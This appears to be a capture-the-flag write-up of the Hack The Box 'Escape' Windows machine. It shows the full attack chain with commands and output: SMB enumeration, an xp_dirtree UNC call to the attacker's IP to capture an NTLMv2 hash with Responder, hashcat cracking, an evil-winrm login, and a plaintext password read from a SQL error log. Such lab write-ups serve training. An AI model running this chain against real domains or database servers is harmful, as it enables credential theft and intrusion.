HTB Escape done
Escape
OS:
Windows
Technology:
MSSQL
IP Address:
10.10.11.202
Open ports:
53/tcp open domain Simple DNS Plus
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2024-04-02 16:59:19Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: sequel.htb0., Site: Default-First-Site-Name)
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: sequel.htb0., Site: Default-First-Site-Name)
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: sequel.htb0., Site: Default-First-Site-Name)
3269/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: sequel.htb0., Site: Default-First-Site-Name)
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
9389/tcp open mc-nmf .NET Message Framing
49667/tcp open msrpc Microsoft Windows RPC
49673/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
49674/tcp open msrpc Microsoft Windows RPC
49686/tcp open msrpc Microsoft Windows RPC
49730/tcp open msrpc Microsoft Windows RPC
57139/tcp open msrpc Microsoft Windows RPC
Users and passwords:
Taken from SQL Server Procedures.pdf on the anonymously readable Public SMB share
Usernames:
Ryan
Tom
Brandon
___
Domain:
sequel.htb
___
Email:
[email protected]
___
Default creds to login database:
L: PublicUser
P: GuestUserCantWrite1
---
Cracked NetNTLMv2 hash for user sql_svc (forced auth via xp_dirtree, captured with Responder, cracked with hashcat mode 5600)
L: sql_svc
P: REGGIE1234ronnie
---
Found in C:\SQLServer\Logs\ERRORLOG.BAK (a password typed into the username field of a failed logon)
L: Ryan.Cooper
P: NuclearMosquito3
---
Nmap
┌──(kali㉿pentest)-[/mnt/oscp/writeups/HTB/HTB_Escape]
└─$ sudo nmap -A -sV --script=default -p- --open -oA 10.10.11.202_nmap 10.10.11.202 ; cat 10.10.11.202_nmap.nmap | grep "tcp.*open"
[sudo] password for kali:
Starting Nmap 7.93 ( https://nmap.org ) at 2024-04-02 10:57 CEST
Nmap scan report for 10.10.11.202
Host is up (0.068s latency).
Not shown: 65516 filtered tcp ports (no-response)
Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2024-04-02 16:59:19Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: sequel.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject:
| Subject Alternative Name: DNS:dc.sequel.htb, DNS:sequel.htb, DNS:sequel
| Not valid before: 2024-01-18T23:03:57
|_Not valid after: 2074-01-05T23:03:57
|_ssl-date: 2024-04-02T17:00:55+00:00; +8h00m00s from scanner time.
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: sequel.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject:
| Subject Alternative Name: DNS:dc.sequel.htb, DNS:sequel.htb, DNS:sequel
| Not valid before: 2024-01-18T23:03:57
|_Not valid after: 2074-01-05T23:03:57
|_ssl-date: 2024-04-02T17:00:54+00:00; +7h59m59s from scanner time.
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: sequel.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject:
| Subject Alternative Name: DNS:dc.sequel.htb, DNS:sequel.htb, DNS:sequel
| Not valid before: 2024-01-18T23:03:57
|_Not valid after: 2074-01-05T23:03:57
|_ssl-date: 2024-04-02T17:00:55+00:00; +8h00m00s from scanner time.
3269/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: sequel.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject:
| Subject Alternative Name: DNS:dc.sequel.htb, DNS:sequel.htb, DNS:sequel
| Not valid before: 2024-01-18T23:03:57
|_Not valid after: 2074-01-05T23:03:57
|_ssl-date: 2024-04-02T17:00:54+00:00; +7h59m59s from scanner time.
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
9389/tcp open mc-nmf .NET Message Framing
49667/tcp open msrpc Microsoft Windows RPC
49673/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
49674/tcp open msrpc Microsoft Windows RPC
49686/tcp open msrpc Microsoft Windows RPC
49730/tcp open msrpc Microsoft Windows RPC
57139/tcp open msrpc Microsoft Windows RPC
Enumerate SMB
┌──(kali㉿pentest)-[/mnt/oscp/writeups/HTB/HTB_Escape]
└─$ smbclient -U anonymous -N -L //10.10.11.202
Sharename Type Comment
--------- ---- -------
ADMIN$ Disk Remote Admin
C$ Disk Default share
IPC$ IPC Remote IPC
NETLOGON Disk Logon server share
Public Disk
SYSVOL Disk Logon server share
Reconnecting with SMB1 for workgroup listing.
do_connect: Connection to 10.10.11.202 failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND)
Unable to connect with SMB1 -- no workgroup available
---
┌──(kali㉿pentest)-[/mnt/oscp/writeups/HTB/HTB_Escape]
└─$ smbclient -U anonymous -N //10.10.11.202/Public
Try "help" to get a list of possible commands.
smb: \> dir
. D 0 Sat Nov 19 12:51:25 2022
.. D 0 Sat Nov 19 12:51:25 2022
SQL Server Procedures.pdf A 49551 Fri Nov 18 14:39:43 2022
5184255 blocks of size 4096. 1464238 blocks available
smb: \> mget SQL Server Procedures.pdf
NT_STATUS_NO_SUCH_FILE listing \SQL
smb: \> mget "SQL Server Procedures.pdf"
Get file SQL Server Procedures.pdf? y
getting file \SQL Server Procedures.pdf of size 49551 as SQL Server Procedures.pdf (218.0 KiloBytes/sec) (average 218.0 KiloBytes/sec)
smb: \> exit
Read pdf file: SQL Server Procedures.pdf
We found interesting things:
Usernames:
Ryan
Tom
Brandon
___
Domain:
sequel.htb
___
Email:
[email protected]
___
Default creds to login database:
L: PublicUser
P: GuestUserCantWrite1
Connect to the MSSQL - impacket - mssqlclient.py
Use impacket
┌──(kali㉿pentest)-[/mnt/oscp/writeups/HTB/HTB_Escape]
└─$ python3 /home/kali/.local/bin/mssqlclient.py sequel.htb/PublicUser:[email protected]
Impacket v0.11.0 - Copyright 2023 Fortra
[*] Encryption required, switching to TLS
[*] ENVCHANGE(DATABASE): Old Value: master, New Value: master
[*] ENVCHANGE(LANGUAGE): Old Value: , New Value: us_english
[*] ENVCHANGE(PACKETSIZE): Old Value: 4096, New Value: 16192
[*] INFO(DC\SQLMOCK): Line 1: Changed database context to 'master'.
[*] INFO(DC\SQLMOCK): Line 1: Changed language setting to us_english.
[*] ACK: Result: 1 - Microsoft SQL Server (150 7208)
[!] Press help for extra shell commands
SQL> help
lcd {path} - changes the current local directory to {path}
exit - terminates the server process (and this session)
enable_xp_cmdshell - you know what it means
disable_xp_cmdshell - you know what it means
xp_cmdshell {cmd} - executes cmd using xp_cmdshell
sp_start_job {cmd} - executes cmd using the sql server agent (blind)
! {cmd} - executes a local shell cmd
SQL> xp_cmdshell whoami
[-] ERROR(DC\SQLMOCK): Line 1: The EXECUTE permission was denied on the object 'xp_cmdshell', database 'mssqlsystemresource', schema 'sys'.
SQL>
Find working stored procedures - MSSQL
https://book.hacktricks.xyz/pentesting-web/sql-injection/mssql-injection#limited-ssrf-using-master-xp-dirtree-and-other-file-stored-procedures
---
PublicUser is denied xp_cmdshell, but xp_dirtree is executable by public by default and takes a UNC path. Pointing it at my own host makes the account the SQL Server service runs as (sequel\sql_svc, as Responder shows below) authenticate to my SMB listener, so I call xp_dirtree and run Responder to capture the NetNTLMv2 response:
SQL> xp_dirtree '\\10.10.14.2\fake_folder'
subdirectory depth
------------ -----
SQL>
___
┌──(kali㉿pentest)-[/mnt/oscp/writeups/HTB/HTB_Escape]
└─$ sudo responder -I tun0 -wv
__
.----.-----.-----.-----.-----.-----.--| |.-----.----.
| _| -__|__ --| _ | _ | | _ || -__| _|
|__| |_____|_____| __|_____|__|__|_____||_____|__|
|__|
NBT-NS, LLMNR & MDNS Responder 3.1.4.0
To support this project:
Github -> https://github.com/sponsors/lgandx
Paypal -> https://paypal.me/PythonResponder
Author: Laurent Gaffie ([email protected])
To kill this script hit CTRL-C
[+] Poisoners:
LLMNR [ON]
NBT-NS [ON]
MDNS [ON]
DNS [ON]
DHCP [OFF]
[+] Servers:
HTTP server [ON]
HTTPS server [ON]
WPAD proxy [ON]
Auth proxy [OFF]
SMB server [ON]
Kerberos server [ON]
SQL server [ON]
FTP server [ON]
IMAP server [ON]
POP3 server [ON]
SMTP server [ON]
DNS server [ON]
LDAP server [ON]
MQTT server [ON]
RDP server [ON]
DCE-RPC server [ON]
WinRM server [ON]
SNMP server [OFF]
[+] HTTP Options:
Always serving EXE [OFF]
Serving EXE [OFF]
Serving HTML [OFF]
Upstream Proxy [OFF]
[+] Poisoning Options:
Analyze Mode [OFF]
Force WPAD auth [OFF]
Force Basic Auth [OFF]
Force LM downgrade [OFF]
Force ESS downgrade [OFF]
[+] Generic Options:
Responder NIC [tun0]
Responder IP [10.10.14.2]
Responder IPv6 [dead:beef:2::1000]
Challenge set [random]
Don't Respond To Names ['ISATAP', 'ISATAP.LOCAL']
[+] Current Session Variables:
Responder Machine Name [WIN-CT68IVJWPQI]
Responder Domain Name [HLTQ.LOCAL]
Responder DCE-RPC Port [47825]
[+] Listening for events...
[SMB] NTLMv2-SSP Client : 10.10.11.202
[SMB] NTLMv2-SSP Username : sequel\sql_svc
[SMB] NTLMv2-SSP Hash : sql_svc::sequel:29b37024217a7d... (truncated here; the full hash is in the hashcat --show output below)
Cracking the NetNTLMv2 hash for user sql_svc with hashcat (auto-detected mode 5600, rockyou.txt). Password cracked:
L: sql_svc
P: REGGIE1234ronnie
---
┌──(kali㉿pentest)-[/mnt/oscp/writeups/HTB/HTB_Escape]
└─$ hashcat NTLM_hash /usr/share/wordlists/rockyou.txt
hashcat (v6.2.6) starting in autodetect mode
OpenCL API (OpenCL 3.0 PoCL 3.1+debian Linux, None+Asserts, RELOC, SPIR, LLVM 15.0.6, SLEEF, DISTRO, POCL_DEBUG) - Platform #1 [The pocl project]
==================================================================================================================================================
* Device #1: pthread-sandybridge-Intel(R) Core(TM) i5-10210U CPU @ 1.60GHz, 4782/9628 MB (2048 MB allocatable), 6MCU
Hash-mode was not specified with -m. Attempting to auto-detect hash mode.
The following mode was auto-detected as the only one matching your input hash:
5600 | NetNTLMv2 | Network Protocol
NOTE: Auto-detect is best effort. The correct hash-mode is NOT guaranteed!
Do NOT report auto-detect issues unless you are certain of the hash type.
Minimum password length supported by kernel: 0
Maximum password length supported by kernel: 256
Hashes: 1 digests; 1 unique digests, 1 unique salts
Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates
Rules: 1
Optimizers applied:
* Zero-Byte
* Not-Iterated
* Single-Hash
* Single-Salt
ATTENTION! Pure (unoptimized) backend kernels selected.
Pure kernels can crack longer passwords, but drastically reduce performance.
If you want to switch to optimized kernels, append -O to your commandline.
See the above message to find out about the exact limits.
Watchdog: Temperature abort trigger set to 90c
Host memory required for this attack: 1 MB
Dictionary cache hit:
* Filename..: /usr/share/wordlists/rockyou.txt
* Passwords.: 14344385
* Bytes.....: 139921507
* Keyspace..: 14344385
Cracking performance lower than expected?
* Append -O to the commandline.
This lowers the maximum supported password/salt length (usually down to 32).
* Append -w 3 to the commandline.
This can cause your screen to lag.
* Append -S to the commandline.
This has a drastic speed impact but can be better for specific attacks.
Typical scenarios are a small wordlist but a large ruleset.
* Update your backend API runtime / driver the right way:
https://hashcat.net/faq/wrongdriver
* Create more work items to make use of your parallelization power:
https://hashcat.net/faq/morework
SQL_SVC::sequel:29b37024217a7d20:9722acb71dd42bbf1f018b3fd9aa3bbc:...:REGGIE1234ronnie
Session..........: hashcat
Status...........: Cracked
Hash.Mode........: 5600 (NetNTLMv2)
Hash.Target......: SQL_SVC::sequel:29b37024217a7d20:9722acb71dd42bbf1f...000000
Time.Started.....: Tue Apr 2 14:38:00 2024 (7 secs)
Time.Estimated...: Tue Apr 2 14:38:07 2024 (0 secs)
Kernel.Feature...: Pure Kernel
Guess.Base.......: File (/usr/share/wordlists/rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........: 1581.9 kH/s (2.39ms) @ Accel:1024 Loops:1 Thr:1 Vec:8
Recovered........: 1/1 (100.00%) Digests (total), 1/1 (100.00%) Digests (new)
Progress.........: 10702848/14344385 (74.61%)
Rejected.........: 0/10702848 (0.00%)
Restore.Point....: 10696704/14344385 (74.57%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:0-1
Candidate.Engine.: Device Generator
Candidates.#1....: RICARDO7 -> RBRADLEY
Hardware.Mon.#1..: Util: 76%
Started: Tue Apr 2 14:37:55 2024
Stopped: Tue Apr 2 14:38:09 2024
┌──(kali㉿pentest)-[/mnt/oscp/writeups/HTB/HTB_Escape]
└─$ hashcat NTLM_hash /usr/share/wordlists/rockyou.txt --show
Hash-mode was not specified with -m. Attempting to auto-detect hash mode.
The following mode was auto-detected as the only one matching your input hash:
5600 | NetNTLMv2 | Network Protocol
NOTE: Auto-detect is best effort. The correct hash-mode is NOT guaranteed!
Do NOT report auto-detect issues unless you are certain of the hash type.
SQL_SVC::sequel:29b37024217a7d20:9722acb71dd42bbf1f018b3fd9aa3bbc:010100000000000000b1ccb10a85da013ee93a4bdb67bbca000000000200080048004c005400510001001e00570049004e002d004300540036003800490056004a00570050005100490004003400570049004e002d004300540036003800490056004a0057005000510049002e0048004c00540051002e004c004f00430041004c000300140048004c00540051002e004c004f00430041004c000500140048004c00540051002e004c004f00430041004c000700080000b1ccb10a85da0106000400020000000800300030000000000000000000000000300000bbe82bb910bba271c98dbf6669064bcbd3e762b57220b91f1e4ecf9042a4a8600a0010000000000000000000000000000000000009001e0063006900660073002f00310030002e00310030002e00310034002e0032000000000000000000:REGGIE1234ronnie
Establish a remote connection - sql_svc
┌──(kali㉿pentest)-[/mnt/oscp/writeups/HTB/HTB_Escape]
└─$ evil-winrm -i 10.10.11.202 -u sql_svc -p REGGIE1234ronnie
Evil-WinRM shell v3.5
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\sql_svc\Documents> whoami /all
USER INFORMATION
----------------
User Name SID
============== ==============================================
sequel\sql_svc S-1-5-21-4078382237-1492182817-2568127209-1106
GROUP INFORMATION
-----------------
Group Name Type SID Attributes
=========================================== ================ ============ ==================================================
Everyone Well-known group S-1-1-0 Mandatory group, Enabled by default, Enabled group
BUILTIN\Remote Management Users Alias S-1-5-32-580 Mandatory group, Enabled by default, Enabled group
BUILTIN\Users Alias S-1-5-32-545 Mandatory group, Enabled by default, Enabled group
BUILTIN\Pre-Windows 2000 Compatible Access Alias S-1-5-32-554 Mandatory group, Enabled by default, Enabled group
BUILTIN\Certificate Service DCOM Access Alias S-1-5-32-574 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NETWORK Well-known group S-1-5-2 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users Well-known group S-1-5-11 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization Well-known group S-1-5-15 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NTLM Authentication Well-known group S-1-5-64-10 Mandatory group, Enabled by default, Enabled group
Mandatory Label\Medium Plus Mandatory Level Label S-1-16-8448
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
============================= ============================== =======
SeMachineAccountPrivilege Add workstations to domain Enabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled
USER CLAIMS INFORMATION
-----------------------
User claims unknown.
Kerberos support for Dynamic Access Control on this device has been disabled.
Read ERRORLOG.BAK
C:\SQLServer\Logs\ERRORLOG.BAK (inside the SQLServer folder in C:\) is a copy of the SQL Server error log from setup. It records two failed logons from 127.0.0.1, 40 ms apart: first for 'sequel.htb\Ryan.Cooper', then for a 'user' named 'NuclearMosquito3'. Ryan put his password in the username field, and SQL Server logs whatever login name it was given, so the password is sitting in the log in clear text. New credentials:
L: Ryan.Cooper
P: NuclearMosquito3
___
*Evil-WinRM* PS C:\Users\sql_svc> cd ../../
*Evil-WinRM* PS C:\> dir
Directory: C:\
Mode LastWriteTime Length Name
---- ------------- ------ ----
d----- 2/1/2023 8:15 PM PerfLogs
d-r--- 2/6/2023 12:08 PM Program Files
d----- 11/19/2022 3:51 AM Program Files (x86)
d----- 11/19/2022 3:51 AM Public
d----- 2/1/2023 1:02 PM SQLServer
d-r--- 2/1/2023 1:55 PM Users
d----- 2/6/2023 7:21 AM Windows
*Evil-WinRM* PS C:\> cd SQLServer
*Evil-WinRM* PS C:\SQLServer> dir
Directory: C:\SQLServer
Mode LastWriteTime Length Name
---- ------------- ------ ----
d----- 2/7/2023 8:06 AM Logs
d----- 11/18/2022 1:37 PM SQLEXPR_2019
-a---- 11/18/2022 1:35 PM 6379936 sqlexpress.exe
-a---- 11/18/2022 1:36 PM 268090448 SQLEXPR_x64_ENU.exe
*Evil-WinRM* PS C:\SQLServer> cd Logs
*Evil-WinRM* PS C:\SQLServer\Logs> dir
Directory: C:\SQLServer\Logs
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 2/7/2023 8:06 AM 27608 ERRORLOG.BAK
*Evil-WinRM* PS C:\SQLServer\Logs> type ERRORLOG.BAK
2022-11-18 13:43:05.96 Server Microsoft SQL Server 2019 (RTM) - 15.0.2000.5 (X64)
Sep 24 2019 13:48:23
Copyright (C) 2019 Microsoft Corporation
Express Edition (64-bit) on Windows Server 2019 Standard Evaluation 10.0 <X64> (Build 17763: ) (Hypervisor)
2022-11-18 13:43:05.97 Server UTC adjustment: -8:00
2022-11-18 13:43:05.97 Server (c) Microsoft Corporation.
2022-11-18 13:43:05.97 Server All rights reserved.
2022-11-18 13:43:05.97 Server Server process ID is 3788.
2022-11-18 13:43:05.97 Server System Manufacturer: 'VMware, Inc.', System Model: 'VMware7,1'.
2022-11-18 13:43:05.97 Server Authentication mode is MIXED.
2022-11-18 13:43:05.97 Server Logging SQL Server messages in file 'C:\Program Files\Microsoft SQL Server\MSSQL15.SQLMOCK\MSSQL\Log\ERRORLOG'.
2022-11-18 13:43:05.97 Server The service account is 'NT Service\MSSQL$SQLMOCK'. This is an informational message; no user action is required.
2022-11-18 13:43:05.97 Server Registry startup parameters:
-d C:\Program Files\Microsoft SQL Server\MSSQL15.SQLMOCK\MSSQL\DATA\master.mdf
-e C:\Program Files\Microsoft SQL Server\MSSQL15.SQLMOCK\MSSQL\Log\ERRORLOG
-l C:\Program Files\Microsoft SQL Server\MSSQL15.SQLMOCK\MSSQL\DATA\mastlog.ldf
2022-11-18 13:43:05.97 Server Command Line Startup Parameters:
-s "SQLMOCK"
-m "SqlSetup"
-Q
-q "SQL_Latin1_General_CP1_CI_AS"
-T 4022
-T 4010
-T 3659
-T 3610
-T 8015
2022-11-18 13:43:05.97 Server SQL Server detected 1 sockets with 1 cores per socket and 1 logical processors per socket, 1 total logical processors; using 1 logical processors based on SQL Server licensing. This is an informational message; no user action is required.
2022-11-18 13:43:05.97 Server SQL Server is starting at normal priority base (=7). This is an informational message only. No user action is required.
2022-11-18 13:43:05.97 Server Detected 2046 MB of RAM. This is an informational message; no user action is required.
2022-11-18 13:43:05.97 Server Using conventional memory in the memory manager.
2022-11-18 13:43:05.97 Server Page exclusion bitmap is enabled.
2022-11-18 13:43:05.98 Server Buffer Pool: Allocating 262144 bytes for 166158 hashPages.
2022-11-18 13:43:06.01 Server Default collation: SQL_Latin1_General_CP1_CI_AS (us_english 1033)
2022-11-18 13:43:06.04 Server Buffer pool extension is already disabled. No action is necessary.
2022-11-18 13:43:06.06 Server Perfmon counters for resource governor pools and groups failed to initialize and are disabled.
2022-11-18 13:43:06.07 Server Query Store settings initialized with enabled = 1,
2022-11-18 13:43:06.07 Server This instance of SQL Server last reported using a process ID of 5116 at 11/18/2022 1:43:04 PM (local) 11/18/2022 9:43:04 PM (UTC). This is an informational message only; no user action is required.
2022-11-18 13:43:06.07 Server Node configuration: node 0: CPU mask: 0x0000000000000001:0 Active CPU mask: 0x0000000000000001:0. This message provides a description of the NUMA configuration for this computer. This is an informational message only. No user action is required.
2022-11-18 13:43:06.07 Server Using dynamic lock allocation. Initial allocation of 2500 Lock blocks and 5000 Lock Owner blocks per node. This is an informational message only. No user action is required.
2022-11-18 13:43:06.08 Server In-Memory OLTP initialized on lowend machine.
2022-11-18 13:43:06.08 Server The maximum number of dedicated administrator connections for this instance is '1'
2022-11-18 13:43:06.09 Server [INFO] Created Extended Events session 'hkenginexesession'
2022-11-18 13:43:06.09 Server Database Instant File Initialization: disabled. For security and performance considerations see the topic 'Database Instant File Initialization' in SQL Server Books Online. This is an informational message only. No user action is required.
2022-11-18 13:43:06.10 Server CLR version v4.0.30319 loaded.
2022-11-18 13:43:06.10 Server Total Log Writer threads: 1. This is an informational message; no user action is required.
2022-11-18 13:43:06.13 Server Database Mirroring Transport is disabled in the endpoint configuration.
2022-11-18 13:43:06.13 Server clflushopt is selected for pmem flush operation.
2022-11-18 13:43:06.14 Server Software Usage Metrics is disabled.
2022-11-18 13:43:06.14 spid9s Warning ******************
2022-11-18 13:43:06.36 spid9s SQL Server started in single-user mode. This an informational message only. No user action is required.
2022-11-18 13:43:06.36 Server Common language runtime (CLR) functionality initialized using CLR version v4.0.30319 from C:\Windows\Microsoft.NET\Framework64\v4.0.30319\.
2022-11-18 13:43:06.37 spid9s Starting up database 'master'.
2022-11-18 13:43:06.38 spid9s The tail of the log for database master is being rewritten to match the new sector size of 4096 bytes. 2048 bytes at offset 419840 in file C:\Program Files\Microsoft SQL Server\MSSQL15.SQLMOCK\MSSQL\DATA\mastlog.ldf will be written.
2022-11-18 13:43:06.39 spid9s Converting database 'master' from version 897 to the current version 904.
2022-11-18 13:43:06.39 spid9s Database 'master' running the upgrade step from version 897 to version 898.
2022-11-18 13:43:06.40 spid9s Database 'master' running the upgrade step from version 898 to version 899.
2022-11-18 13:43:06.41 spid9s Database 'master' running the upgrade step from version 899 to version 900.
2022-11-18 13:43:06.41 spid9s Database 'master' running the upgrade step from version 900 to version 901.
2022-11-18 13:43:06.41 spid9s Database 'master' running the upgrade step from version 901 to version 902.
2022-11-18 13:43:06.52 spid9s Database 'master' running the upgrade step from version 902 to version 903.
2022-11-18 13:43:06.52 spid9s Database 'master' running the upgrade step from version 903 to version 904.
2022-11-18 13:43:06.72 spid9s SQL Server Audit is starting the audits. This is an informational message. No user action is required.
2022-11-18 13:43:06.72 spid9s SQL Server Audit has started the audits. This is an informational message. No user action is required.
2022-11-18 13:43:06.74 spid9s SQL Trace ID 1 was started by login "sa".
2022-11-18 13:43:06.74 spid9s Server name is 'DC\SQLMOCK'. This is an informational message only. No user action is required.
2022-11-18 13:43:06.75 spid14s Starting up database 'mssqlsystemresource'.
2022-11-18 13:43:06.75 spid9s Starting up database 'msdb'.
2022-11-18 13:43:06.75 spid18s Password policy update was successful.
2022-11-18 13:43:06.76 spid14s The resource database build version is 15.00.2000. This is an informational message only. No user action is required.
2022-11-18 13:43:06.78 spid9s The tail of the log for database msdb is being rewritten to match the new sector size of 4096 bytes. 3072 bytes at offset 50176 in file C:\Program Files\Microsoft SQL Server\MSSQL15.SQLMOCK\MSSQL\DATA\MSDBLog.ldf will be written.
2022-11-18 13:43:06.78 spid9s Converting database 'msdb' from version 897 to the current version 904.
2022-11-18 13:43:06.78 spid9s Database 'msdb' running the upgrade step from version 897 to version 898.
2022-11-18 13:43:06.79 spid14s Starting up database 'model'.
2022-11-18 13:43:06.79 spid9s Database 'msdb' running the upgrade step from version 898 to version 899.
2022-11-18 13:43:06.80 spid14s The tail of the log for database model is being rewritten to match the new sector size of 4096 bytes. 512 bytes at offset 73216 in file C:\Program Files\Microsoft SQL Server\MSSQL15.SQLMOCK\MSSQL\DATA\modellog.ldf will be written.
2022-11-18 13:43:06.80 spid9s Database 'msdb' running the upgrade step from version 899 to version 900.
2022-11-18 13:43:06.81 spid14s Converting database 'model' from version 897 to the current version 904.
2022-11-18 13:43:06.81 spid14s Database 'model' running the upgrade step from version 897 to version 898.
2022-11-18 13:43:06.81 spid9s Database 'msdb' running the upgrade step from version 900 to version 901.
2022-11-18 13:43:06.81 spid14s Database 'model' running the upgrade step from version 898 to version 899.
2022-11-18 13:43:06.81 spid9s Database 'msdb' running the upgrade step from version 901 to version 902.
2022-11-18 13:43:06.82 spid14s Database 'model' running the upgrade step from version 899 to version 900.
2022-11-18 13:43:06.88 spid18s A self-generated certificate was successfully loaded for encryption.
2022-11-18 13:43:06.88 spid18s Server local connection provider is ready to accept connection on [ \\.\pipe\SQLLocal\SQLMOCK ].
2022-11-18 13:43:06.88 spid18s Dedicated administrator connection support was not started because it is disabled on this edition of SQL Server. If you want to use a dedicated administrator connection, restart SQL Server using the trace flag 7806. This is an informational message only. No user action is required.
2022-11-18 13:43:06.88 spid18s SQL Server is now ready for client connections. This is an informational message; no user action is required.
2022-11-18 13:43:06.88 Server SQL Server is attempting to register a Service Principal Name (SPN) for the SQL Server service. Kerberos authentication will not be possible until a SPN is registered for the SQL Server service. This is an informational message. No user action is required.
2022-11-18 13:43:06.88 spid14s Database 'model' running the upgrade step from version 900 to version 901.
2022-11-18 13:43:06.89 Server The SQL Server Network Interface library could not register the Service Principal Name (SPN) [ MSSQLSvc/dc.sequel.htb:SQLMOCK ] for the SQL Server service. Windows return code: 0x2098, state: 15. Failure to register a SPN might cause integrated authentication to use NTLM instead of Kerberos. This is an informational message. Further action is only required if Kerberos authentication is required by authentication policies and if the SPN has not been manually registered.
2022-11-18 13:43:06.89 spid14s Database 'model' running the upgrade step from version 901 to version 902.
2022-11-18 13:43:06.89 spid14s Database 'model' running the upgrade step from version 902 to version 903.
2022-11-18 13:43:06.89 spid14s Database 'model' running the upgrade step from version 903 to version 904.
2022-11-18 13:43:07.00 spid14s Clearing tempdb database.
2022-11-18 13:43:07.06 spid14s Starting up database 'tempdb'.
2022-11-18 13:43:07.17 spid9s Database 'msdb' running the upgrade step from version 902 to version 903.
2022-11-18 13:43:07.17 spid9s Database 'msdb' running the upgrade step from version 903 to version 904.
2022-11-18 13:43:07.29 spid9s Recovery is complete. This is an informational message only. No user action is required.
2022-11-18 13:43:07.30 spid51 Changed database context to 'master'.
2022-11-18 13:43:07.30 spid51 Changed language setting to us_english.
2022-11-18 13:43:07.33 spid51 Configuration option 'show advanced options' changed from 0 to 1. Run the RECONFIGURE statement to install.
2022-11-18 13:43:07.34 spid51 Configuration option 'default language' changed from 0 to 0. Run the RECONFIGURE statement to install.
2022-11-18 13:43:07.34 spid51 Configuration option 'default full-text language' changed from 1033 to 1033. Run the RECONFIGURE statement to install.
2022-11-18 13:43:07.34 spid51 Configuration option 'show advanced options' changed from 1 to 0. Run the RECONFIGURE statement to install.
2022-11-18 13:43:07.39 spid51 Configuration option 'show advanced options' changed from 0 to 1. Run the RECONFIGURE statement to install.
2022-11-18 13:43:07.39 spid51 Configuration option 'user instances enabled' changed from 1 to 1. Run the RECONFIGURE statement to install.
2022-11-18 13:43:07.39 spid51 Configuration option 'show advanced options' changed from 1 to 0. Run the RECONFIGURE statement to install.
2022-11-18 13:43:07.44 spid51 Changed database context to 'master'.
2022-11-18 13:43:07.44 spid51 Changed language setting to us_english.
2022-11-18 13:43:07.44 Logon Error: 18456, Severity: 14, State: 8.
2022-11-18 13:43:07.44 Logon Logon failed for user 'sequel.htb\Ryan.Cooper'. Reason: Password did not match that for the login provided. [CLIENT: 127.0.0.1]
2022-11-18 13:43:07.48 Logon Error: 18456, Severity: 14, State: 8.
2022-11-18 13:43:07.48 Logon Logon failed for user 'NuclearMosquito3'. Reason: Password did not match that for the login provided. [CLIENT: 127.0.0.1]
2022-11-18 13:43:07.72 spid51 Attempting to load library 'xpstar.dll' into memory. This is an informational message only. No user action is required.
2022-11-18 13:43:07.76 spid51 Using 'xpstar.dll' version '2019.150.2000' to execute extended stored procedure 'xp_sqlagent_is_starting'. This is an informational message only; no user action is required.
2022-11-18 13:43:08.24 spid51 Changed database context to 'master'.
2022-11-18 13:43:08.24 spid51 Changed language setting to us_english.
2022-11-18 13:43:09.29 spid9s SQL Server is terminating in response to a 'stop' request from Service Control Manager. This is an informational message only. No user action is required.
2022-11-18 13:43:09.31 spid9s .NET Framework runtime has been stopped.
2022-11-18 13:43:09.43 spid9s SQL Trace was stopped due to server shutdown. Trace ID = '1'. This is an informational message only; no user action is required.
*Evil-WinRM* PS C:\SQLServer\Logs>
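The leak above is a generic pattern: SQL Server writes the supplied login name verbatim into ERRORLOG, so a user who types a password into the username box leaves it there in clear text for anyone who can read the log (here, any WinRM user on the box). Added example (my own detection script, not from the original notes or from Microsoft): it scans ERRORLOG lines for a failed logon of a known login followed within a few seconds, from the same client, by a failed logon for a "user" that is not a known login. The sample log mixes the two real lines from this box with constructed lines; the known-logins set, the 5-second window and the function names are assumptions.

```python
"""Spot the 'password typed into the username field' pattern in a SQL Server ERRORLOG.
Added example for this writeup (my own code, not from the original notes or from Microsoft)."""
import re
from datetime import datetime, timedelta
from typing import Dict, Iterable, List, Tuple

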